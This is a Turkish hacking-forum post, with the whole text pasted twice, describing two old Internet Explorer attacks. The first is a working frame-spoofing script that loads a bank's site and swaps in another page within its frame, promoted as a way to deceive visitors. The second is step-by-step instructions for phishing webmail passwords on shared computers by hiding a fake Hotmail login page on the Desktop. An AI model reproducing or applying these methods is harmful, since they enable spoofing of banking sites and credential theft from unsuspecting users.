..::cadawra::..
New member
- Katılım
- 18 Ara 2005
- Mesajlar
- 62
- Reaction score
- 0
- Puanları
- 0
- Yaş
- 37
Ei acıgı (ınanamassınız)...
Internet Explorer da bug sayılabilecek bir hata daha. Ufak bir kod
ile frame bulunan sayfadaki framelerden birini veya bir kaçını iste-
diğimiz bir sayfa ile değiştirebiliyoruz. Script kodu aşağıda...
<SCRIPT>
b=window.open("http://www.citybank.com");
function g()
{
b.frames[2].location="http://www.yahoo.com";
}
setTimeout("g()",6000);
</SCRIPT>
Bu kod sayesidne Önce City Bank penceresi açılacak. City Bank ın Üst
ve alt pencerelirini göreceksiniz. Ortada yer alan ana Frame ise Yahoo
olarak açılacak. Böylece bu kodu kullanarak sizin sayfanızdaki linkten
o adrese gidenler sizin istediğiniz web sayfası nı görmüş olacaklar.
Hemde bir şey fark etmeden. Doğrusu bu büyük bir Bug ve Microshit bunun
için bir yama çıkardı bile...
Heman altta bu konu ile ilgili hazırlanmış bir html dökümanının kaynak
kodu bulunuyor.
********
<HTML>
<TITLE>
Frame spoofing
</TITLE>
Frame spoofing
<BR>
<A HREF="index.html">Written by Georgi Guninski</A>
<BR>
<SCRIPT>
b=window.open("http://www.citybank.com");
function g()
{
b.frames[2].location="http://www.yahoo.com";
}
setTimeout("g()",6000);
</SCRIPT>
Look at the spoofed frame in the other window in few seconds.
</HTML>
********
Bu kod ile bir sayfa açılıyor hemen ardından başka bir pencere peydah oluyor ve baktığınızda
City Bank olan ama Ana sayfa olarak yahoo nun ana sayfası olan ve gerçekte var olmayan bir sayfa
açılmış oluyor...
2. Açık
Internet ortamına uzun zamandır takılan ve hack olaylarıyla yakından ilgilenen biri olarak bugüne
kadar birçok mail hack yöntemi ve buglar gördüm. Büyük hack takımları yada bireysel isimlerle
çalışan ve bululan çok exploit gördüm. Ancak bugüne kadar bulunan hack yöntemlerinden biride son
derece basit olmasına karşın güzel ve anlamlı bir şekilde hazırlanmasıyla dikkatimi çekti.. Mail
hack yöntemlerinden biri olan karşı tarafa kullandığı mail adresinin bir kopyasını yollayarak
kişiyi kandırıp username ve passwordunu mail adresinize göndermesini sağlamak
(Tabi daha sonra bazı lamer ruhlu insanlar sayesinde herkesin eline düşünce artık önemini
yitirdi. Fakat önemli olan ilk hazırlayan kişinin kurnazca birşey hazırladığı gerçeği ve bende
bu nedenle takdire şayan görüyorum). Ancak bunu bazı internet cafelerde veya remote kontrolü
sağlamayı başaranlar ele geçirmek istedikleri mail adreslerini almak ve kullanıcıyı yanıtlmak
için bu *.HTM veya *.HTML dosyalarını HardDisk üzerine kaydedip sonrada Internet Explorer`ın
giriş sayfası falan yaparak kullanıcının yanılmasını sağladılar. Fakat bu sistemin artık
herkesin eline düşmüş olmasıyla kimsenin bunu yemiyor olması bir gerçek. Artık kullanıcı
browserı açtıktan sonra gireceği adresi kendi yazıyor böylecede HardDisk üzerinde kaydedilmiş
olan bir adrese yönlendirilerek mail şifresinin başkasının eline geçmesini imkansızlaştırıyor.
İşte bu noktada "Asla imkansız diye birşey yoktur" diyip işe koyulduğumuz zaman bunuda
aşabileceğimizi göreceğiz.
- İsterseniz başlayalım...
1- Sahte mail kodlarından birini bir yerden bulup temin edelim.. şuan benim elimde bazı kodlar
var ancak tam olarak test edipte çalışıp çalışmadığını bilmediğim için sizi boşuna oyalamayim
siz bir yerden henüz kullandığı hostingi çökmemiş olan bir kod bulursanız daha sağlıklı olur..
2- Bu kodu alıp bir notepadle açın.. ve <title> </title> tagları arasını kullandığı mail serverın
giriş sayfasındaki title`la aynı yapınki dikkat çekmesin..
3- Sonra hangi adresse mesela hotmail.comdan bir mailse.. dosyanızı www.hotmail.com.htm olarak
Desktop dizinine kaydedin.
4- Oluşturduğunuz dosyanın üzerine gelin ve Özellikler yazısına tıklayarak dosyayı gizli konuma
getirin.
5- Eğer Windowsta Gizli dosyaları göster aktifse bunuda
Bilgisayarım*Araçlar*Klasör Seçenekleri*Görünüm bölümünden pasif konuma getirin.
Daha sonra Internet explorerı açıp browsera "www.hotmail.com" yazın ve bombayı görün..
karşınıza HDD üzerine kaydetmiş olduğunuz www.hotmail.com sayfası gelecektir.
Burda önemli olan Internet Explorer`ın tüm Windows sürümlerinde Desktop dizinini root dizin
olarak tanımlamasıdır.
Internet Explorer da bug sayılabilecek bir hata daha. Ufak bir kod
ile frame bulunan sayfadaki framelerden birini veya bir kaçını iste-
diğimiz bir sayfa ile değiştirebiliyoruz. Script kodu aşağıda...
<SCRIPT>
b=window.open("http://www.citybank.com");
function g()
{
b.frames[2].location="http://www.yahoo.com";
}
setTimeout("g()",6000);
</SCRIPT>
Bu kod sayesidne Önce City Bank penceresi açılacak. City Bank ın Üst
ve alt pencerelirini göreceksiniz. Ortada yer alan ana Frame ise Yahoo
olarak açılacak. Böylece bu kodu kullanarak sizin sayfanızdaki linkten
o adrese gidenler sizin istediğiniz web sayfası nı görmüş olacaklar.
Hemde bir şey fark etmeden. Doğrusu bu büyük bir Bug ve Microshit bunun
için bir yama çıkardı bile...
Heman altta bu konu ile ilgili hazırlanmış bir html dökümanının kaynak
kodu bulunuyor.
********
<HTML>
<TITLE>
Frame spoofing
</TITLE>
Frame spoofing
<BR>
<A HREF="index.html">Written by Georgi Guninski</A>
<BR>
<SCRIPT>
b=window.open("http://www.citybank.com");
function g()
{
b.frames[2].location="http://www.yahoo.com";
}
setTimeout("g()",6000);
</SCRIPT>
Look at the spoofed frame in the other window in few seconds.
</HTML>
********
Bu kod ile bir sayfa açılıyor hemen ardından başka bir pencere peydah oluyor ve baktığınızda
City Bank olan ama Ana sayfa olarak yahoo nun ana sayfası olan ve gerçekte var olmayan bir sayfa
açılmış oluyor...
2. Açık
Internet ortamına uzun zamandır takılan ve hack olaylarıyla yakından ilgilenen biri olarak bugüne
kadar birçok mail hack yöntemi ve buglar gördüm. Büyük hack takımları yada bireysel isimlerle
çalışan ve bululan çok exploit gördüm. Ancak bugüne kadar bulunan hack yöntemlerinden biride son
derece basit olmasına karşın güzel ve anlamlı bir şekilde hazırlanmasıyla dikkatimi çekti.. Mail
hack yöntemlerinden biri olan karşı tarafa kullandığı mail adresinin bir kopyasını yollayarak
kişiyi kandırıp username ve passwordunu mail adresinize göndermesini sağlamak
(Tabi daha sonra bazı lamer ruhlu insanlar sayesinde herkesin eline düşünce artık önemini
yitirdi. Fakat önemli olan ilk hazırlayan kişinin kurnazca birşey hazırladığı gerçeği ve bende
bu nedenle takdire şayan görüyorum). Ancak bunu bazı internet cafelerde veya remote kontrolü
sağlamayı başaranlar ele geçirmek istedikleri mail adreslerini almak ve kullanıcıyı yanıtlmak
için bu *.HTM veya *.HTML dosyalarını HardDisk üzerine kaydedip sonrada Internet Explorer`ın
giriş sayfası falan yaparak kullanıcının yanılmasını sağladılar. Fakat bu sistemin artık
herkesin eline düşmüş olmasıyla kimsenin bunu yemiyor olması bir gerçek. Artık kullanıcı
browserı açtıktan sonra gireceği adresi kendi yazıyor böylecede HardDisk üzerinde kaydedilmiş
olan bir adrese yönlendirilerek mail şifresinin başkasının eline geçmesini imkansızlaştırıyor.
İşte bu noktada "Asla imkansız diye birşey yoktur" diyip işe koyulduğumuz zaman bunuda
aşabileceğimizi göreceğiz.
- İsterseniz başlayalım...
1- Sahte mail kodlarından birini bir yerden bulup temin edelim.. şuan benim elimde bazı kodlar
var ancak tam olarak test edipte çalışıp çalışmadığını bilmediğim için sizi boşuna oyalamayim
siz bir yerden henüz kullandığı hostingi çökmemiş olan bir kod bulursanız daha sağlıklı olur..
2- Bu kodu alıp bir notepadle açın.. ve <title> </title> tagları arasını kullandığı mail serverın
giriş sayfasındaki title`la aynı yapınki dikkat çekmesin..
3- Sonra hangi adresse mesela hotmail.comdan bir mailse.. dosyanızı www.hotmail.com.htm olarak
Desktop dizinine kaydedin.
4- Oluşturduğunuz dosyanın üzerine gelin ve Özellikler yazısına tıklayarak dosyayı gizli konuma
getirin.
5- Eğer Windowsta Gizli dosyaları göster aktifse bunuda
Bilgisayarım*Araçlar*Klasör Seçenekleri*Görünüm bölümünden pasif konuma getirin.
Daha sonra Internet explorerı açıp browsera "www.hotmail.com" yazın ve bombayı görün..
karşınıza HDD üzerine kaydetmiş olduğunuz www.hotmail.com sayfası gelecektir.
Burda önemli olan Internet Explorer`ın tüm Windows sürümlerinde Desktop dizinini root dizin
olarak tanımlamasıdır.